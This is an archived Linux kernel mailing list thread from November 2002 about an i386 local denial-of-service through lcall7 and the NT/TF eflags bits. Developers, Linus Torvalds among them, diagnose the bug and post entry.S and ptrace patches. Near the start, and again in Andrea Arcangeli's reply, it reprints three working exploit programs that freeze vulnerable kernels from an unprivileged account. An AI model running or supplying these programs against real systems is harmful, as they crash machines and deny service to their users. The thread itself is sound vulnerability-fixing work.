2002-11-12 23:22:21

by Leif Sawyer

[permalink] [raw]
Subject: FW: i386 Linux kernel DoS

This was posted on bugtraq today...


-----Original Message-----
From: Christophe Devine
Sent: Monday, November 11, 2002 11:26 AM
To: [email protected]
Subject: i386 Linux kernel DoS

/* USE AT YOUR OWN RISK ! */

int main( void )
{
char dos[] = "\x9C" /* pushfd */
"\x58" /* pop eax */
"\x0D\x00\x01\x00\x00" /* or eax,100h */
"\x50" /* push eax */
"\x9D" /* popfd */
"\x9A\x00\x00\x00\x00\x07\x00"; /* call 07h:00h */

void (* f)( void );

f = (void *) dos; (* f)();

return 1;
}


2002-11-12 23:25:02

by Christoph Hellwig

[permalink] [raw]
Subject: Re: FW: i386 Linux kernel DoS

On Tue, Nov 12, 2002 at 02:28:55PM -0900, Leif Sawyer wrote:
> This was posted on bugtraq today...

A real segfaulting program? wow :)

2002-11-12 23:38:25

by Alan

[permalink] [raw]
Subject: Re: FW: i386 Linux kernel DoS

On Tue, 2002-11-12 at 23:31, Christoph Hellwig wrote:
> On Tue, Nov 12, 2002 at 02:28:55PM -0900, Leif Sawyer wrote:
> > This was posted on bugtraq today...
>
> A real segfaulting program? wow :)

Looks like the TF handling bug which was fixed a while ago

2002-11-13 23:31:35

by Jiri Kosina

[permalink] [raw]
Subject: Re: FW: i386 Linux kernel DoS

On 13 Nov 2002, Alan Cox wrote:

> > > This was posted on bugtraq today...
> > A real segfaulting program? wow :)
> Looks like the TF handling bug which was fixed a while ago

This was posted today ;) (uff, the two-side forwarded conversation ;) )

== cut here ==
>From [email protected] Thu Nov 14 00:35:59 2002
Date: Wed, 13 Nov 2002 00:59:09 +0000
From: Christophe Devine <[email protected]>
To: [email protected]
Subject: Re: i386 Linux kernel DoS

On Wed, 13 Nov 2002, Stefan Laudat wrote:

> Regarding this issue: is it 80x86 or specifically 80386 designed ?
> Been trying it on AMD Duron, AMD Athlon MP, Intel i586 - just segfaults :(

Yep; the first version of the DoS I posted on bugtraq was defective and
worked only under special conditions (inside gdb for example).

However this updated version works much better:

#include <sys/ptrace.h>

struct user_regs_struct {
long ebx, ecx, edx, esi, edi, ebp, eax;
unsigned short ds, __ds, es, __es;
unsigned short fs, __fs, gs, __gs;
long orig_eax, eip;
unsigned short cs, __cs;
long eflags, esp;
unsigned short ss, __ss;
};

int main( void )
{
int pid;
char dos[] = "\x9A\x00\x00\x00\x00\x07\x00";
void (* lcall7)( void ) = (void *) dos;
struct user_regs_struct d;

if( ! ( pid = fork() ) )
{
usleep( 1000 );
(* lcall7)();
}
else
{
ptrace( PTRACE_ATTACH, pid, 0, 0 );
while( 1 )
{
wait( 0 );
ptrace( PTRACE_GETREGS, pid, 0, &d );
d.eflags |= 0x4100; /* set TF and NT */
ptrace( PTRACE_SETREGS, pid, 0, &d );
ptrace( PTRACE_SYSCALL, pid, 0, 0 );
}
}

return 1;
}

At the beginning I thought only kernels <= 2.4.18 were affected; but it
appeared that both kernels 2.4.19 and 2.4.20-rc1 are vulnerable as well.
The flaw seems to be related to the kernel's handling of the nested task
(NT) flag inside a lcall7.

== cut here ==

--
JiKos.


2002-11-13 23:53:55

by Chris Wright

[permalink] [raw]
Subject: Re: FW: i386 Linux kernel DoS

* Jirka Kosina ([email protected]) wrote:
> On 13 Nov 2002, Alan Cox wrote:
>
> > > > This was posted on bugtraq today...
> > > A real segfaulting program? wow :)
> > Looks like the TF handling bug which was fixed a while ago
>
> This was posted today ;) (uff, the two-side forwarded conversation ;) )
>

yeah, this has already been posted. as has a patch:

http://marc.theaimsgroup.com/?l=linux-kernel&m=103722485108857&w=2

thanks,
-chris
--
Linux Security Modules http://lsm.immunix.org http://lsm.bkbits.net

2002-11-14 02:59:31

by Andrea Arcangeli

[permalink] [raw]
Subject: Re: FW: i386 Linux kernel DoS

On Wed, Nov 13, 2002 at 12:10:19AM +0000, Alan Cox wrote:
> On Tue, 2002-11-12 at 23:31, Christoph Hellwig wrote:
> > On Tue, Nov 12, 2002 at 02:28:55PM -0900, Leif Sawyer wrote:
> > > This was posted on bugtraq today...
> >
> > A real segfaulting program? wow :)
>
> Looks like the TF handling bug which was fixed a while ago

Program received signal SIGSEGV, Segmentation fault.
0xc01097d9 in restore_all ()
(gdb) bt
#0 0xc01097d9 in restore_all ()
#1 0xbfffe4b7 in ?? ()

c01097d9: cf iret

it's the NT not the TF. iret is called with NT set and the cpu
follows the back link which is zero (we never use hardware task
switching and nt is artificially set so it would lead to kernel
malfunction anyways).

the TF was fixed a while ago as you said and that's fine now.

we just can't allow userspace to set NT or iret will crash at ret from
userspace, furthmore there's no useful thing the userspace can do with
the NT flag.

here the fix, it applies to all 2.4 and 2.5:

--- 2.4.20rc1aa2/arch/i386/kernel/ptrace.c.~1~ Fri Aug 9 14:52:06 2002
+++ 2.4.20rc1aa2/arch/i386/kernel/ptrace.c Thu Nov 14 03:56:00 2002
@@ -28,7 +28,7 @@

/* determines which flags the user has access to. */
/* 1 = access 0 = no access */
-#define FLAG_MASK 0x00044dd5
+#define FLAG_MASK 0x00040dd5

/* set's the trap flag. */
#define TRAP_FLAG 0x100


Andrea

2002-11-14 04:04:23

by Andrea Arcangeli

[permalink] [raw]
Subject: Re: FW: i386 Linux kernel DoS

On Thu, Nov 14, 2002 at 04:05:41AM +0100, Andrea Arcangeli wrote:
> On Wed, Nov 13, 2002 at 12:10:19AM +0000, Alan Cox wrote:
> > On Tue, 2002-11-12 at 23:31, Christoph Hellwig wrote:
> > > On Tue, Nov 12, 2002 at 02:28:55PM -0900, Leif Sawyer wrote:
> > > > This was posted on bugtraq today...
> > >
> > > A real segfaulting program? wow :)
> >
> > Looks like the TF handling bug which was fixed a while ago
>
> Program received signal SIGSEGV, Segmentation fault.
> 0xc01097d9 in restore_all ()
> (gdb) bt
> #0 0xc01097d9 in restore_all ()
> #1 0xbfffe4b7 in ?? ()
>
> c01097d9: cf iret
>
> it's the NT not the TF. iret is called with NT set and the cpu
> follows the back link which is zero (we never use hardware task
> switching and nt is artificially set so it would lead to kernel
> malfunction anyways).
>
> the TF was fixed a while ago as you said and that's fine now.
>
> we just can't allow userspace to set NT or iret will crash at ret from
> userspace, furthmore there's no useful thing the userspace can do with
> the NT flag.
>
> here the fix, it applies to all 2.4 and 2.5:
>
> --- 2.4.20rc1aa2/arch/i386/kernel/ptrace.c.~1~ Fri Aug 9 14:52:06 2002
> +++ 2.4.20rc1aa2/arch/i386/kernel/ptrace.c Thu Nov 14 03:56:00 2002
> @@ -28,7 +28,7 @@
>
> /* determines which flags the user has access to. */
> /* 1 = access 0 = no access */
> -#define FLAG_MASK 0x00044dd5
> +#define FLAG_MASK 0x00040dd5
>
> /* set's the trap flag. */
> #define TRAP_FLAG 0x100

sorry, this is the wrong fix, it happened to fix the problem for the
only testcase working out there because such a testcase was written in a
way that used ptrace to set the eflags instead of a more simple
pushf popf lcall like this:

int main( void )
{
char dos[] = "\x9C" /* pushfd */
"\x58" /* pop eax */
"\x0D\x00\x41\x00\x00" /* or eax,4100h */
"\x50" /* push eax */
"\x9D" /* popfd */
"\x9A\x00\x00\x00\x00\x07\x00"; /* call 07h:00h */

void (* f)( void );

f = (void *) dos; (* f)();

return 1;
}

(note the above is differnet to the one posted on bugtraq, the above one
is a simple version of the "working" exploit posted to l-k)

I clearly misunderstood how the nt works, it is read from the in core
eflags, not from the copy on the stack, so my patch won't make any
difference as far as the kernel is concerned and the only problem was
again with lcall, so the right fix is the last one from Petr. sorry for
the spam.

Andrea

2002-11-14 09:01:01

by Helge Hafting

[permalink] [raw]
Subject: Re: FW: i386 Linux kernel DoS

Jirka Kosina wrote:
[...]
> At the beginning I thought only kernels <= 2.4.18 were affected; but it
> appeared that both kernels 2.4.19 and 2.4.20-rc1 are vulnerable as well.
> The flaw seems to be related to the kernel's handling of the nested task
> (NT) flag inside a lcall7.

Ouch. That one froze up 2.5.47, running from a user account.
I couldn't recover with sysrq, but I was able to
emergency remount-ro avoiding the bootup fsck's.

Helge Hafting

2002-11-14 18:06:58

by Linus Torvalds

[permalink] [raw]
Subject: Re: FW: i386 Linux kernel DoS


Ok, the reason for this one is that we don't really emulate a
trap/interrupt gate correctly when taking a lcall. We _do_ set up the
stack to be identical, but a real trap/interrupt will also clear TF and NT
in EFLAGS on entry to the kernel (_after_ having saved the value off), and
our emulation code didn't do that.

So when we returned with an "iret", we had NT set in EFLAGS, causing the
iret to do all the wrong things.

This is my 2.5.x fix, I suspect it applies as-is to 2.4.x too. I don't
think anything has changed here in a long time.

Does anybody see anything else we're missing from the emulation path?

(Or path_s_, as I noticed after fixing the bug once already ;^p. We should
probably try to do this all as common code rather than having two separate
paths for lcall 0x7 and lcall 0x27 - the code is identical apart from one
little constant.. This looks like the minimal patch, though.)

Linus

-----
# The following is the BitKeeper ChangeSet Log
# --------------------------------------------
# 02/11/14 [email protected] 1.848
# Fix impressive call gate misuse DoS reported on bugtraq.
# --------------------------------------------
# 02/11/14 [email protected] 1.849
# Duh. Fix the other lcall entry point too.
# --------------------------------------------
#
diff -Nru a/arch/i386/kernel/entry.S b/arch/i386/kernel/entry.S
--- a/arch/i386/kernel/entry.S Thu Nov 14 09:59:08 2002
+++ b/arch/i386/kernel/entry.S Thu Nov 14 09:59:08 2002
@@ -66,7 +66,9 @@
OLDSS = 0x38

CF_MASK = 0x00000001
+TF_MASK = 0x00000100
IF_MASK = 0x00000200
+DF_MASK = 0x00000400
NT_MASK = 0x00004000
VM_MASK = 0x00020000

@@ -134,6 +136,17 @@
movl %eax,EFLAGS(%esp) #
movl %edx,EIP(%esp) # Now we move them to their "normal" places
movl %ecx,CS(%esp) #
+
+ #
+ # Call gates don't clear TF and NT in eflags like
+ # traps do, so we need to do it ourselves.
+ # %eax already contains eflags (but it may have
+ # DF set, clear that also)
+ #
+ andl $~(DF_MASK | TF_MASK | NT_MASK),%eax
+ pushl %eax
+ popfl
+
movl %esp, %ebx
pushl %ebx
andl $-8192, %ebx # GET_THREAD_INFO
@@ -156,6 +169,17 @@
movl %eax,EFLAGS(%esp) #
movl %edx,EIP(%esp) # Now we move them to their "normal" places
movl %ecx,CS(%esp) #
+
+ #
+ # Call gates don't clear TF and NT in eflags like
+ # traps do, so we need to do it ourselves.
+ # %eax already contains eflags (but it may have
+ # DF set, clear that also)
+ #
+ andl $~(DF_MASK | TF_MASK | NT_MASK),%eax
+ pushl %eax
+ popfl
+
movl %esp, %ebx
pushl %ebx
andl $-8192, %ebx # GET_THREAD_INFO

2002-11-14 18:54:34

by Andrea Arcangeli

[permalink] [raw]
Subject: Re: FW: i386 Linux kernel DoS

On Thu, Nov 14, 2002 at 10:12:53AM -0800, Linus Torvalds wrote:
>
> Ok, the reason for this one is that we don't really emulate a
> trap/interrupt gate correctly when taking a lcall. We _do_ set up the
> stack to be identical, but a real trap/interrupt will also clear TF and NT

actually TF should cleared implicitly in the do_debug or it could get
the single step trap before you can clear TF explicitly in the entry.S.
but it's certainly zerocost to clear it explicitly there too just to
remeber it's one of the bits not cleared implicitly in hardware when
entering via lcall. However in 2.5 it seems the clear_TF in do_debug is
still missing.

basically you need to add this check in do_debug too:

--- x/arch/i386/kernel/traps.c.~1~ Fri Aug 9 14:52:06 2002
+++ x/arch/i386/kernel/traps.c Thu Nov 14 19:57:42 2002
@@ -514,10 +514,14 @@ asmlinkage void do_debug(struct pt_regs
{
unsigned int condition;
struct task_struct *tsk = current;
+ unsigned long eip = regs->eip;
siginfo_t info;

__asm__ __volatile__("movl %%db6,%0" : "=r" (condition));

+ if ((eip >=PAGE_OFFSET) && (regs->eflags & TF_MASK))
+ goto clear_TF;
+
/* Mask out spurious debug traps due to lazy DR7 setting */
if (condition & (DR_TRAP0|DR_TRAP1|DR_TRAP2|DR_TRAP3)) {
if (!tsk->thread.debugreg[7])


or maybe I'm missing something and 2.5 fixes it in another way that I
didn't notice.

> in EFLAGS on entry to the kernel (_after_ having saved the value off), and
> our emulation code didn't do that.
>
> So when we returned with an "iret", we had NT set in EFLAGS, causing the
> iret to do all the wrong things.

Yep.

Andrea

2002-11-14 19:11:20

by Linus Torvalds

[permalink] [raw]
Subject: Re: FW: i386 Linux kernel DoS


On Thu, 14 Nov 2002, Andrea Arcangeli wrote:
>
> actually TF should cleared implicitly in the do_debug or it could get
> the single step trap before you can clear TF explicitly in the entry.S.

But that's fine. Getting a single step trap in the kernel is not a
problem: the trap will clear TF/NT on the "recursive" kernel entry, and on
the recursive "iret" nothing bad will happen.

Remember: what is on the _stack_ doesn't matter. The only thing that
matters is what is actually in the EFLAGS register itself.

> but it's certainly zerocost to clear it explicitly there too just to
> remeber it's one of the bits not cleared implicitly in hardware when
> entering via lcall. However in 2.5 it seems the clear_TF in do_debug is
> still missing.

No, do_debug() already does

/* Mask out spurious TF errors due to lazy TF clearing */
if (condition & DR_STEP) {
if ((regs->xcs & 3) == 0)
goto clear_TF;

which will make sure that we only get _one_ of these spurious (and
harmless) TF traps if somebody tries to mess with us.

So that is correct (and your patch is _not_ correct - it's not right
checking what the EIP value is, since it doesn't matter. In fact, I think
you could quite validly have "big" EIP values in user space by just
creating interesting code segments).

Linus

2002-11-14 19:59:59

by Petr Vandrovec

[permalink] [raw]
Subject: Re: FW: i386 Linux kernel DoS

On Thu, Nov 14, 2002 at 10:12:53AM -0800, Linus Torvalds wrote:
>
> (Or path_s_, as I noticed after fixing the bug once already ;^p. We should
> probably try to do this all as common code rather than having two separate
> paths for lcall 0x7 and lcall 0x27 - the code is identical apart from one
> little constant.. This looks like the minimal patch, though.)

What about this? It even generates shorter code in each branch, as
movl xx(%esp),%yy is 4 byte, while movl xx(%ebx),%yy is 3 byte opcode.

I also converted "movl %4(%edx),%edx; call *%edx" to "call *4(%edx)", 2 bytes
and one opcode shorter. I hope that it is also faster...

Appears to work...
Petr Vandrovec
[email protected]

---

lcall7 and lcall27 paths differ only in one constant. Let's use constant
first, and execute common code after this.

entry.S | 47 ++++++++++++-----------------------------------
1 files changed, 12 insertions(+), 35 deletions(-)

--- linux-2.5.47-c849.dist/arch/i386/kernel/entry.S 2002-11-14 19:38:33.000000000 +0100
+++ linux-2.5.47-c849/arch/i386/kernel/entry.S 2002-11-14 20:53:26.000000000 +0100
@@ -130,12 +130,16 @@
# gates, which has to be cleaned up later..
pushl %eax
SAVE_ALL
- movl EIP(%esp), %eax # due to call gates, this is eflags, not eip..
- movl CS(%esp), %edx # this is eip..
- movl EFLAGS(%esp), %ecx # and this is cs..
- movl %eax,EFLAGS(%esp) #
- movl %edx,EIP(%esp) # Now we move them to their "normal" places
- movl %ecx,CS(%esp) #
+ movl %esp, %ebx
+ pushl %ebx
+ pushl $0x7
+do_lcall:
+ movl EIP(%ebx), %eax # due to call gates, this is eflags, not eip..
+ movl CS(%ebx), %edx # this is eip..
+ movl EFLAGS(%ebx), %ecx # and this is cs..
+ movl %eax,EFLAGS(%ebx) #
+ movl %edx,EIP(%ebx) # Now we move them to their "normal" places
+ movl %ecx,CS(%ebx) #

#
# Call gates don't clear TF and NT in eflags like
@@ -147,13 +151,9 @@
pushl %eax
popfl

- movl %esp, %ebx
- pushl %ebx
andl $-8192, %ebx # GET_THREAD_INFO
movl TI_EXEC_DOMAIN(%ebx), %edx # Get the execution domain
- movl 4(%edx), %edx # Get the lcall7 handler for the domain
- pushl $0x7
- call *%edx
+ call *4(%edx) # Call the lcall7 handler for the domain
addl $4, %esp
popl %eax
jmp resume_userspace
@@ -163,33 +163,10 @@
# gates, which has to be cleaned up later..
pushl %eax
SAVE_ALL
- movl EIP(%esp), %eax # due to call gates, this is eflags, not eip..
- movl CS(%esp), %edx # this is eip..
- movl EFLAGS(%esp), %ecx # and this is cs..
- movl %eax,EFLAGS(%esp) #
- movl %edx,EIP(%esp) # Now we move them to their "normal" places
- movl %ecx,CS(%esp) #
-
- #
- # Call gates don't clear TF and NT in eflags like
- # traps do, so we need to do it ourselves.
- # %eax already contains eflags (but it may have
- # DF set, clear that also)
- #
- andl $~(DF_MASK | TF_MASK | NT_MASK),%eax
- pushl %eax
- popfl
-
movl %esp, %ebx
pushl %ebx
- andl $-8192, %ebx # GET_THREAD_INFO
- movl TI_EXEC_DOMAIN(%ebx), %edx # Get the execution domain
- movl 4(%edx), %edx # Get the lcall7 handler for the domain
pushl $0x27
- call *%edx
- addl $4, %esp
- popl %eax
- jmp resume_userspace
+ jmp do_lcall


ENTRY(ret_from_fork)

2002-11-15 02:06:34

by Andrea Arcangeli

[permalink] [raw]
Subject: Re: FW: i386 Linux kernel DoS

On Thu, Nov 14, 2002 at 11:17:47AM -0800, Linus Torvalds wrote:
>
> On Thu, 14 Nov 2002, Andrea Arcangeli wrote:
> >
> > actually TF should cleared implicitly in the do_debug or it could get
> > the single step trap before you can clear TF explicitly in the entry.S.
>
> But that's fine. Getting a single step trap in the kernel is not a
> problem: the trap will clear TF/NT on the "recursive" kernel entry, and on
> the recursive "iret" nothing bad will happen.
>
> Remember: what is on the _stack_ doesn't matter. The only thing that

yes.

> matters is what is actually in the EFLAGS register itself.
>
> > but it's certainly zerocost to clear it explicitly there too just to
> > remeber it's one of the bits not cleared implicitly in hardware when
> > entering via lcall. However in 2.5 it seems the clear_TF in do_debug is
> > still missing.
>
> No, do_debug() already does
>
> /* Mask out spurious TF errors due to lazy TF clearing */
> if (condition & DR_STEP) {
> if ((regs->xcs & 3) == 0)
> goto clear_TF;
>
> which will make sure that we only get _one_ of these spurious (and
> harmless) TF traps if somebody tries to mess with us.
>
> So that is correct (and your patch is _not_ correct - it's not right
> checking what the EIP value is, since it doesn't matter. In fact, I think
> you could quite validly have "big" EIP values in user space by just
> creating interesting code segments).

actually I just had to workaround that code for kgdb, and yes, vsyscalls
would run above PAGE_OFFSET too. OTOH now I don't see anymore the point
of the patch that I posted that is included in 2.4.20rc1, I wrongly
assumed that setting the TF would not guarantee DR_STEP to be set in
db6 (there would be no other reason for such patch) but according to the
manual this isn't the case, so 2.5 is correct and 2.4.20rc1 is overkill
and so I'll backout that patch too, that will avoid the ugly workaround
with kgdb too (that basically disabled such check on the eip as soon as
kgdb was started). If anybody can see a problem in backing out from 2.4
the patch I was suggesting for 2.5 please let me know. Thanks.

Andrea

2002-11-16 19:26:26

by Krzysiek Taraszka

[permalink] [raw]
Subject: Re: FW: i386 Linux kernel DoS

On 13 Nov 2002, Alan Cox wrote:

> On Tue, 2002-11-12 at 23:31, Christoph Hellwig wrote:
> > On Tue, Nov 12, 2002 at 02:28:55PM -0900, Leif Sawyer wrote:
> > > This was posted on bugtraq today...
> >
> > A real segfaulting program? wow :)
>
> Looks like the TF handling bug which was fixed a while ago

It wasn't fixed for 2.2.22. 2.2 has got only syscall7, so fix should be
trivial, isn't ?
Should be look like:


diff -urN linux.orig/arch/i386/kernel/entry.S
linux/arch/i386/kernel/entry.S
--- linux.orig/arch/i386/kernel/entry.S Tue May 21 01:32:34 2002
+++ linux/arch/i386/kernel/entry.S Thu Nov 14 21:39:36 2002
@@ -63,7 +63,9 @@
OLDSS = 0x38

CF_MASK = 0x00000001
+TF_MASK = 0x00000100
IF_MASK = 0x00000200
+DF_MASK = 0x00000400
NT_MASK = 0x00004000
VM_MASK = 0x00020000

@@ -139,6 +141,9 @@
movl CS(%esp),%edx # this is eip..
movl EFLAGS(%esp),%ecx # and this is cs..
movl %eax,EFLAGS(%esp) #
+ andl $~(NT_MASK|TF_MASK|DF_MASK), %eax
+ pushl %eax
+ popfl
movl %edx,EIP(%esp) # Now we move them to their "normal" places
movl %ecx,CS(%esp) #
movl %esp,%ebx


or I missing somethink ?

Krzysiek Taraszka ([email protected])